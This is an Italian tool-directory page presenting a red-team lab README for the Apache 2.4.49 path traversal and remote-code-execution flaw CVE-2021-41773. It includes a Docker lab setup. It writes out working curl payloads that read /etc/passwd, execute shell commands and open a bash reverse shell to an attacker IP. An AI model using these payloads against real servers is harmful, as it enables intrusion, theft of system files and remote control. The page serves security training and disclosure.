Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-41773-RedTeam — Apache 2.4.49 Path Traversal RCE | Kitploit
Strumenti/GitHubGitHub/sobanahmed6061/cve-2021-41773-redteam
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubsobanahmed6061/cve-2021-41773-redteam

CVE-2021-41773-RedTeam

Apache 2.4.49 Path Traversal RCE

Vedi Repository
15 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-41773 — Apache HTTP Server 2.4.49 Path Traversal / RCE

Dipartimento Cybersecurity ITSOLERA — Red Team Task #3
Team: Offensive Team Zeta
Data: 18 marzo 2026


⚠️ Disclaimer

Questo repository è solo a scopo educativo.
Tutti i test sono stati eseguiti in un laboratorio Docker locale isolato.
Non utilizzare mai contro sistemi live, in produzione o di terze parti.


Riepilogo CVE

CampoDettaglio
CVE IDCVE-2021-41773
CVSS9.8 CRITICO
Versioni vulnerabiliSolo Apache HTTP Server 2.4.49
TipoPath Traversal + Remote Code Execution
Corretto inApache 2.4.51

Contenuto del Repository

FileDescrizione
poc_41773.pyScript di exploit PoC in Python con banner Team Zeta
docker-compose.ymlConfigurazione dell'ambiente di laboratorio vulnerabile
offensive_zeta_shell.txtLog della sessione live — prova dello sfruttamento
screenshots/Screenshot delle evidenze
Offensive_Team_Zeta_FINAL_Report.pdfReport completo dello sfruttamento

Configurazione del Laboratorio

root@kitploit:~
# Pull the vulnerable image
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid

# Start the lab
docker-compose up -d

# Verify Apache 2.4.49 is running
curl -I http://localhost:8080/
# Must show: Server: Apache/2.4.49

Sfruttamento

root@kitploit:~
# File read via path traversal
curl --path-as-is \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

# Remote code execution
curl --path-as-is \
    -d 'echo Content-Type: text/plain; echo; id' \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

# Reverse shell (replace IP with your machine IP)
curl --path-as-is \
    -d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
    "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2021-41773
  • https://www.exploit-db.com/exploits/50383
  • https://httpd.apache.org/security/vulnerabilities_24.html
Scarica lo strumento